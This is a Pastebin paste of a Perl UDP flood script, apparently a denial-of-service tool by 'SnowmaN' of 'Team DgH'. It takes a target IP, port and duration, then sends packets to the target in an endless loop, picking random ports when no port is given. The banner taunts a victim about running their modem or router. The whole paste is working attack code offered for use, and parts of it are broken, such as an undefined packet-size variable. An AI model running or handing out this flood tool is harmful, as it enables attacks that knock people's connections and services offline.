Guest User

Resirec Attack Code

a guest
Jul 7th, 2015
873
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C++ 1.12 KB | None | 0 0
  1. #!/usr/bin/perl
  2.  
  3. use Socket;
  4.  
  5. $ARGC=@ARGV;
  6.  
  7. if ($ARGC !=3) {
  8.  printf "To initiate a UDP Flood\n";
  9.  printf "perl $0 ip port time\n";
  10.  printf "Coded by SnowmaN\n";
  11.  printf "Team DgH is Running 2013\n";
  12.  exit(1);
  13. }
  14.  
  15. my ($ip,$port,$size,$time);
  16.  $ip=$ARGV[0];
  17.  $port=$ARGV[1];
  18.  $time=$ARGV[2];
  19.  
  20. socket(crazy, PF_INET, SOCK_DGRAM, 17);
  21.     $iaddr = inet_aton("$ip");
  22.  
  23. print <<EOTEXT;
  24.            Where's Ya Big Mouth @ Now HuH?
  25.      DgH By SnowmaN On Port 53 Random. Get @ Me.
  26. EOTEXT
  27. printf "~SnowmaN RuNz Your Modem/Router!~ $ip on port $port\n";
  28.  
  29. if ($ARGV[1] ==0 && $ARGV[2] ==0) {
  30. goto randpackets;
  31. }
  32. if ($ARGV[1] !=0 && $ARGV[2] !=0) {
  33. system("(sleep $time;killall -9 udp) &");
  34. goto packets;
  35. }
  36. if ($ARGV[1] !=0 && $ARGV[2] ==0) {
  37. goto packets;
  38. }
  39. if ($ARGV[1] ==0 && $ARGV[2] !=0) {
  40. system("(sleep $time;killall -9 udp) &");
  41. goto randpackets;
  42. }
  43.  
  44. packets:
  45. for (;;) {
  46. $size=$rand x $rand x $rand;
  47. send(crazy, 0, $size, sockaddr_in($port, $iaddr));
  48. }
  49.  
  50. randpackets:
  51. for (;;) {
  52. $size=$rand x $rand x $rand;
  53. $port=int(rand 65000) +1;
  54. send(crazy, 0, $size, sockaddr_in($port, $iaddr));
  55. }
Advertisement
Add Comment
Please, Sign In to add comment